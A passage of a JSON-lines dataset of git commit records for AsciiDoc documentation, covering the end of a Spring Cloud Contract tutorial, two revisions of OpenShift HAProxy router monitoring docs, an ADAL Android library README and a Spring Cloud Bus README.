given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\nIf you used the Groovy DSL, you can see, all the `producer()` parts of the Contract that were present in the\n`value(consumer(...), producer(...))` blocks got injected into the test.\nIn case of using YAML, the same applied for the `matchers` sections of the `response`.\n\nNote that, on the producer side, you are also doing TDD. The expectations are expressed\nin the form of a test. This test sends a request to our own application with the URL,\nheaders, and body defined in the contract. It also is expecting precisely defined values\nin the response. In other words, you have the `red` part of `red`, `green`, and\n`refactor`. It is time to convert the `red` into the `green`.\n\n*Write the missing implementation.*\n\nBecause you know the expected input and expected output, you can write the missing\nimplementation:\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=server_api,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=new_impl,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=initial_impl,indent=0]\n}\n----\n\nWhen you execute `.\/mvnw clean install` again, the tests pass. Since the `Spring Cloud\nContract Verifier` plugin adds the tests to the `generated-test-sources`, you can\nactually run those tests from your IDE.\n\n*Deploy your app.*\n\nOnce you finish your work, you can deploy your change. First, merge the branch:\n\n[source,bash,indent=0]\n----\n$ git checkout master\n$ git merge --no-ff contract-change-pr\n$ git push origin master\n----\n\nYour CI might run something like `.\/mvnw clean deploy`, which would publish both the\napplication and the stub artifacts.\n\n==== Consumer Side (Loan Issuance) Final Step\n\nAs a developer of the Loan Issuance service (a consumer of the Fraud Detection server):\n\n*Merge branch to master.*\n\n[source,bash,indent=0]\n----\n$ git checkout master\n$ git merge --no-ff contract-change-pr\n----\n\n*Work online.*\n\nNow you can disable the offline work for Spring Cloud Contract Stub Runner and indicate\nwhere the repository with your stubs is located. At this moment the stubs of the server\nside are automatically downloaded from Nexus\/Artifactory. You can set the value of\n`stubsMode` to `REMOTE`. The following code shows an example of\nachieving the same thing by changing the properties.\n\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nThat's it!\n\n=== Dependencies\n\nThe best way to add dependencies is to use the proper `starter` dependency.\n\nFor `stub-runner`, use `spring-cloud-starter-stub-runner`. When you use a plugin, add\n`spring-cloud-starter-contract-verifier`.\n\n=== Additional Links\n\nHere are some resources related to Spring Cloud Contract Verifier and Stub Runner. Note\nthat some may be outdated, because the Spring Cloud Contract Verifier project is under\nconstant development.\n\n==== Spring Cloud Contract video\n\nYou can check out the video from the Warsaw JUG about Spring Cloud Contract:\n\nvideo::sAAklvxmPmk[youtube,start=538,width=640,height=480]\n\n==== Readings\n\n- http:\/\/www.slideshare.net\/MarcinGrzejszczak\/stick-to-the-rules-consumer-driven-contracts-201507-confitura[Slides from Marcin Grzejszczak's talk about Accurest]\n- http:\/\/toomuchcoding.com\/blog\/categories\/accurest\/[Accurest related articles from Marcin Grzejszczak's blog]\n- http:\/\/toomuchcoding.com\/blog\/categories\/spring-cloud-contract\/[Spring Cloud Contract related articles from Marcin Grzejszczak's blog]\n- http:\/\/groovy-lang.org\/json.html[Groovy docs regarding JSON]\n\n=== Samples\n\nYou can find some samples at\nhttps:\/\/github.com\/spring-cloud-samples\/spring-cloud-contract-samples[samples].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab29f0c27edee80268d6617f3748ed827535101d","subject":"Cleanup example to get haproxy statistics via oc exec.","message":"Cleanup example to get haproxy statistics via oc exec.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/router.adoc","new_file":"admin_guide\/router.adoc","new_contents":"= Monitoring Routers\n{product-author}\n{product-version]\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nDepending on the underlying implementation, you can monitor a running\nlink:..\/architecture\/core_concepts\/routes.html[router] in multiple ways. This\ntopic discusses the HAProxy template router and the components to check to\nensure its health.\n\n== Viewing Statistics\nThe HAProxy router exposes a web listener for the HAProxy statistics. Enter the\nrouter's public IP address and the correctly configured port (*1936* by default)\nto view the statistics page, and enter the administrator password when prompted.\nThis password and port are configured during the router installation, but they\ncan be found by viewing the *_haproxy.conf_* file on the container.\n\n== Disabling Statistics View\nBy default the HAProxy statistics are exposed on port *1936* (with a\npassword protected account). To disable exposing the HAProxy statistics,\nspecify *0* as the stats port number.\n\nifdef::openshift-enterprise[]\n====\n----\n$ oadm router hap --service-account=router --stats-port=0 \\\n --credentials='\/etc\/openshift\/master\/openshift-router.kubeconfig'\n----\n====\nendif::[]\nifdef::openshift-origin[]\n====\n----\n$ oadm router hap --service-account=router --stats-port=0 \\\n --credentials=\"$KUBECONFIG\"\n----\n====\nendif::[]\n\n\nNote: HAProxy will still collect and store statistics, it would just _not_\n expose them via a web listener. You can still get access to the\n statistics by sending a request to the HAProxy AF_UNIX socket inside\n the HAProxy Router container.\n\n====\n----\n$ cmd=\"echo 'show stat' | socat - UNIX-CONNECT:\/var\/lib\/haproxy\/run\/haproxy.sock\"\n$ routerPod=$(oc get pods --selector=\"router=router\" \\\n --template=\"{{with index .items 0}}{{.metadata.name}}{{end}}\")\n$ oc exec $routerPod -- bash -c \"$cmd\"\n----\n====\n\n== Viewing Logs\nTo view a router log, run the `oc log` command on the pod. Since the router is\nrunning as a plug-in process that manages the underlying implementation, the log\nis for the plug-in, not the actual HAProxy log.\n\n== Viewing the Router Internals\n*routes.json*\n\nRoutes are processed by the HAProxy router, and are stored both in memory, on\ndisk, and in the HAProxy configuration file. The internal route representation,\nwhich is passed to the template to generate the HAProxy configuration file, is\nfound in the *_\/var\/lib\/containers\/router\/routes.json_* file. When\ntroubleshooting a routing issue, view this file to see the data being used to\ndrive configuration.\n\n*HAProxy configuration*\n\nYou can find the HAProxy configuration and the backends that have been created\nfor specific routes in the *_\/var\/lib\/haproxy\/conf\/haproxy.conf_* file. The\nmapping files are found in the same directory. The helper frontend and\nbackends use mapping files when mapping incoming requests to a backend.\n\n*Certificates*\n\nCertificates are stored in two places:\n\n- Certificates for edge terminated and re-encrypt terminated routes are stored\nin the *_\/var\/lib\/containers\/router\/certs_* directory.\n- Certificates that are used for connecting to backends for re-encrypt\nterminated routes are stored in the *_\/var\/lib\/containers\/router\/cacerts_*\ndirectory.\n\nThe files are keyed by the namespace and name of the route. The key,\ncertificate, and CA certificate are concatenated into a single file. You can use\nlink:https:\/\/www.openssl.org\/[OpenSSL] to view the contents of these files.\n","old_contents":"= Monitoring Routers\n{product-author}\n{product-version]\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nDepending on the underlying implementation, you can monitor a running\nlink:..\/architecture\/core_concepts\/routes.html[router] in multiple ways. This\ntopic discusses the HAProxy template router and the components to check to\nensure its health.\n\n== Viewing Statistics\nThe HAProxy router exposes a web listener for the HAProxy statistics. Enter the\nrouter's public IP address and the correctly configured port (*1936* by default)\nto view the statistics page, and enter the administrator password when prompted.\nThis password and port are configured during the router installation, but they\ncan be found by viewing the *_haproxy.conf_* file on the container.\n\n== Disabling Statistics View\nBy default the HAProxy statistics are exposed on port *1936* (with a\npassword protected account). To disable exposing the HAProxy statistics,\nspecify *0* as the stats port number.\n\nifdef::openshift-enterprise[]\n====\n----\n$ oadm router hap --service-account=router --stats-port=0 \\\n --credentials='\/etc\/openshift\/master\/openshift-router.kubeconfig'\n----\n====\nendif::[]\nifdef::openshift-origin[]\n====\n----\n$ oadm router hap --service-account=router --stats-port=0 \\\n --credentials=\"$KUBECONFIG\"\n----\n====\nendif::[]\n\n\nNote: HAProxy will still collect and store statistics, it would just _not_\n expose them via a web listener. You can still get access to the\n statistics by sending a request to the HAProxy AF_UNIX socket inside\n the HAProxy Router container.\n\n====\n----\n$ cmd=\"echo 'show stat' | socat - UNIX-CONNECT:\/var\/lib\/haproxy\/run\/haproxy.sock\"\n$ oc exec $(oc get pods --selector=\"router=router\" \\\n --template=\"{{with index .items 0}}{{.metadata.name}}{{end}}\") -- \\\n bash -c \"$cmd\"\n----\n====\n\n== Viewing Logs\nTo view a router log, run the `oc log` command on the pod. Since the router is\nrunning as a plug-in process that manages the underlying implementation, the log\nis for the plug-in, not the actual HAProxy log.\n\n== Viewing the Router Internals\n*routes.json*\n\nRoutes are processed by the HAProxy router, and are stored both in memory, on\ndisk, and in the HAProxy configuration file. The internal route representation,\nwhich is passed to the template to generate the HAProxy configuration file, is\nfound in the *_\/var\/lib\/containers\/router\/routes.json_* file. When\ntroubleshooting a routing issue, view this file to see the data being used to\ndrive configuration.\n\n*HAProxy configuration*\n\nYou can find the HAProxy configuration and the backends that have been created\nfor specific routes in the *_\/var\/lib\/haproxy\/conf\/haproxy.conf_* file. The\nmapping files are found in the same directory. The helper frontend and\nbackends use mapping files when mapping incoming requests to a backend.\n\n*Certificates*\n\nCertificates are stored in two places:\n\n- Certificates for edge terminated and re-encrypt terminated routes are stored\nin the *_\/var\/lib\/containers\/router\/certs_* directory.\n- Certificates that are used for connecting to backends for re-encrypt\nterminated routes are stored in the *_\/var\/lib\/containers\/router\/cacerts_*\ndirectory.\n\nThe files are keyed by the namespace and name of the route. The key,\ncertificate, and CA certificate are concatenated into a single file. You can use\nlink:https:\/\/www.openssl.org\/[OpenSSL] to view the contents of these files.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4fd311124f3e7a993d93ad637a499188ec1d4cea","subject":"edits after peer review","message":"edits after peer review\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/router.adoc","new_file":"admin_guide\/router.adoc","new_contents":"= Routers\n{product-author}\n{product-version]\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nDepending on the underlying implementation, you can monitor a running\nlink:..\/architecture\/core_objects\/routing.html[router] in multiple ways. This\ntopic discusses the HAProxy template router, and the components to check to\nensure its health.\n\n== Viewing Statistics\nThe HAProxy router exposes a web listener for the HAProxy statistics. Enter the\nrouter's public IP address and the correctly configured port (1936 by default)\nto view the statistics page, and enter the admin password when prompted. This\npassword and port were configured during the router installation, but can be\nfound by viewing the *_haproxy.conf_* file on the container.\n\n== Viewing Logs\nTo view a router log, run the `oc log` command on the pod. Since the router is\nrunning as a plug-in process that manages the underlying implementation, the log\nis for the plug-in, not the actual HAProxy log.\n\n== Router Internals\n.Routes.json\n\nRoutes are processed by the HAProxy router, and are stored both in memory, on\ndisk, and in the HAProxy configuration file. The internal route representation,\nwhich is passed to the template to generate the HAProxy configuration file, is\nfound in the *_\/var\/lib\/containers\/router\/routes.json_* file. When\ntroubleshooting a routing issue, view this file to see the data being used to\ndrive configuration.\n\n.HAProxy Config\n\nYou can find the HAProxy configuration and the back-ends that have been created\nfor specific routes in the *_\/var\/lib\/haproxy\/conf\/haproxy.conf_* file. The\nmapping files are found in the same directory. The helper front-end and\nback-ends use mapping files when mapping incoming requests to a back-end.\n\n.Certificates\n\nCertificates are stored in two places. Certificates for edge terminated and\nre-encrypt terminated routes are stored in the\n*_\/var\/lib\/containers\/router\/certs_* directory. Certificates that are used for\nconnecting to back-ends for re-encrypt terminated routes are stored in the\n*_\/var\/lib\/containers\/router\/cacerts_* directory. The files are keyed by the\nnamespace and name of the route. The key, certificate, and CA certificate are\nconcatenated into a single file. You can use\nlink:https:\/\/www.openssl.org\/[OpenSSL] to view the contents of these files.\n","old_contents":"= Routers\n{product-author}\n{product-version]\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nOnce you have a running link:..\/architecture\/core_objects\/routing.html[Router] you are ready\nto monitor it. Depending on the underlying router implementation this may be accomplished\nmultiple ways. This document will discuss the HAProxy template router and the different\ncomponents that can be checked to ensure its health.\n\n== Viewing Statistics\nThe HAProxy router exposes a web listener for the HAProxy statistics. You can enter the public\nIP address of the router with the correctly configured port to view the statistics page. You \nwill be prompted for the admin password. This password and port were configured during the\nrouter installation.\n\n== Viewing Logs\nTo view a router log, simply run the `oc log` command for the pod. Keep in mind that since\nthe router is running as a plugin process that manages the underlying implementation the log\nthat you will see is the log for the plugin, not the actual HAProxy log. \n\n== Router Internals\n.Routes.json\n\nAs routes are processed by the HAProxy router they are stored both in memory, on disk, and in\nthe HAProxy configuration file. In `\/var\/lib\/containers\/router\/routes.json` you can find the\ninternal representation of the routes that is passed to the template to generate the HAProxy\nconfiguration file. When troubleshooting a route issue it may help to look at this file to\nsee the data that is being used to drive configuration.\n\n.HAProxy Config\n\nIn `\/var\/lib\/haproxy\/conf\/haproxy.conf` you can find the configuration that is being used\nby HAProxy. Here is where you can view the backends that have been created for specific routes.\nAlso, in the same directory you can find the mapping files that are used by the helper \nfrontend and backends when mapping an incoming request to a backend.\n\n.Certificates\n\nCertificates are stored in two places. Certificates that are presented at the edge for edge\nterminated and re-encrypt terminated routes are stored in `\/var\/lib\/containers\/router\/certs\/`.\nCertificates that are used when connecting to backends for re-encrypt terminated routes are\nstored in `\/var\/lib\/containers\/router\/cacerts\/`. The files are keyed by the namespace and\nname of the route. You will find that the key, certificate, and CA certificate are \nconcatenated into a single file. You may use openssl to view the contents of these files.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d62473d599ba9753eadb66dc13d00ffd1c5e783","subject":"Add readme reference to license.","message":"Add readme reference to license.\n","repos":"massivedisaster\/ADAL","old_file":"README.adoc","new_file":"README.adoc","new_contents":":libVersion: 0.1.7\n\n# ADAL\n\nimage:https:\/\/api.bintray.com\/packages\/jmspt\/maven\/adal\/images\/download.svg[Build Status,link=https:\/\/bintray.com\/jmspt\/maven\/adal\/_latestVersion]\n\nAndroid Development Accelaration Library\n\nAdd the dependency in the form:\n[source, groovy, subs='attributes']\ndependencies {\n \/* Include all modules *\/\n compile 'com.massivedisaster.adal:adal:{libVersion}'\n \/* Specific modules*\/\n compile 'com.massivedisaster.adal:adal-accounts:{libVersion}'\n compile 'com.massivedisaster.adal:adal-adapters:{libVersion}'\n compile 'com.massivedisaster.adal:adal-analytics:{libVersion}'\n compile 'com.massivedisaster.adal:adal-bus:{libVersion}'\n compile 'com.massivedisaster.adal:adal-fragments:{libVersion}'\n compile 'com.massivedisaster.adal:adal-managers:{libVersion}'\n compile 'com.massivedisaster.adal:adal-network:{libVersion}'\n compile 'com.massivedisaster.adal:adal-utils:{libVersion}'\n compile 'com.massivedisaster.adal:adal-location:{libVersion}'\n}\n\n### License\n[GNU LESSER GENERAL PUBLIC LICENSE](LICENSE.md) \n","old_contents":":libVersion: 0.1.7\n\n# ADAL\n\nimage:https:\/\/api.bintray.com\/packages\/jmspt\/maven\/adal\/images\/download.svg[Build Status,link=https:\/\/bintray.com\/jmspt\/maven\/adal\/_latestVersion]\n\nAndroid Development Accelaration Library\n\nAdd the dependency in the form:\n[source, groovy, subs='attributes']\ndependencies {\n \/* Include all modules *\/\n compile 'com.massivedisaster.adal:adal:{libVersion}'\n \/* Specific modules*\/\n compile 'com.massivedisaster.adal:adal-accounts:{libVersion}'\n compile 'com.massivedisaster.adal:adal-adapters:{libVersion}'\n compile 'com.massivedisaster.adal:adal-analytics:{libVersion}'\n compile 'com.massivedisaster.adal:adal-bus:{libVersion}'\n compile 'com.massivedisaster.adal:adal-fragments:{libVersion}'\n compile 'com.massivedisaster.adal:adal-managers:{libVersion}'\n compile 'com.massivedisaster.adal:adal-network:{libVersion}'\n compile 'com.massivedisaster.adal:adal-utils:{libVersion}'\n compile 'com.massivedisaster.adal:adal-location:{libVersion}'\n}\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8a5007bb8e9981b4f78771c893d0a153a776f900","subject":"Update README","message":"Update README\n","repos":"spring-cloud\/spring-cloud-bus,spring-cloud\/spring-cloud-bus","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/ Do not edit this file (e.g. go instead to src\/main\/asciidoc)\n\n= Spring Cloud Bus\n\nSpring Cloud Bus links nodes of a distributed system with a lightweight message broker. This can then be used to broadcast state changes (e.g. configuration changes) or other management instructions. A key idea is that the Bus is like a distributed Actuator for a Spring Boot application that is scaled out, but it can also be used as a communication channel between apps. The only implementation currently is with an AMQP broker as the transport, but the same basic feature set (and some more depending on the transport) is on the roadmap for other transports.\n\n\n== Quick Start\n\nSpring Cloud Bus works by adding Spring Boot autconfiguration if it detects itself on the classpath. All you need to do to enable the bus is to add `spring-cloud-starter-bus-amqp` or `spring-cloud-starter-bus-kafka` to your dependency management and Spring Cloud takes care of the rest. Make sure the broker (RabbitMQ or Kafka) is available and configured: running on localhost you shouldn't have to do anything, but if you are running remotely use Spring Cloud Connectors, or Spring Boot conventions to define the broker credentials, e.g. for Rabbit\n\n.application.yml\n----\nspring:\n rabbitmq:\n host: mybroker.com\n port: 5672\n username: user\n password: secret\n----\n\nThe bus currently supports sending messages to all nodes listening or all nodes for a particular service (as defined by Eureka). More selector criteria may be added in the future (ie. only service X nodes in data center Y, etc...). There are also some http endpoints are under the `\/bus\/*` actuator namespace. There are currently two implemented. The first, `\/bus\/env`, sends key\/values pairs to update each nodes Spring Environment. The second, `\/bus\/refresh`, will reload each application's configuration, just as if they had all been pinged on their `\/refresh` endpoint.\n\nNOTE: the Bus starters cover Rabbit and Kafka, because those are the two most common implementations, but Spring Cloud Stream is quite flexible and binder will work combined with `spring-cloud-bus`.\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttp:\/\/compose.docker.io\/[Docker Compose] to run the middeware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttp:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttp:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttp:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the http:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/support.springsource.com\/spring_committer_signup[contributor's agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n http:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow http:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).","old_contents":"\/\/ Do not edit this file (e.g. go instead to docs\/src\/main\/asciidoc)\n\n= Spring Cloud Bus\n\nSpring Cloud Bus links nodes of a distributed system with a lightweight message broker. This can then be used to broadcast state changes (e.g. configuration changes) or other management instructions. A key idea is that the Bus is like a distributed Actuator for a Spring Boot application that is scaled out, but it can also be used as a communication channel between apps. The only implementation currently is with an AMQP broker as the transport, but the same basic feature set (and some more depending on the transport) is on the roadmap for other transports.\n\n\n== Quick Start\n\nSpring Cloud Bus works by adding Spring Boot autconfiguration if it detects itself on the classpath. All you need to do to enable the bus is to add `spring-cloud-starter-bus-amqp` or `spring-cloud-starter-bus-kafka` to your dependency management and Spring Cloud takes care of the rest. Make sure the broker (RabbitMQ or Kafka) is available and configured: running on localhost you shouldn't have to do anything, but if you are running remotely use Spring Cloud Connectors, or Spring Boot conventions to define the broker credentials, e.g. for Rabbit\n\n.application.yml\n----\nspring:\n rabbitmq:\n host: mybroker.com\n port: 5672\n username: user\n password: secret\n----\n\nThe bus currently supports sending messages to all nodes listening or all nodes for a particular service (as defined by Eureka). More selector criteria may be added in the future (ie. only service X nodes in data center Y, etc...). There are also some http endpoints are under the `\/bus\/*` actuator namespace. There are currently two implemented. The first, `\/bus\/env`, sends key\/values pairs to update each nodes Spring Environment. The second, `\/bus\/refresh`, will reload each application's configuration, just as if they had all been pinged on their `\/refresh` endpoint.\n\nNOTE: the Bus starters cover Rabbit and Kafka, because those are the two most common implementations, but Spring Cloud Stream is quite flexible and binder will work combined with `spring-cloud-bus`.\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttp:\/\/compose.docker.io\/[Docker Compose] to run the middeware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttp:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttp:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttp:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the http:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/support.springsource.com\/spring_committer_signup[contributor's agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n http:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would 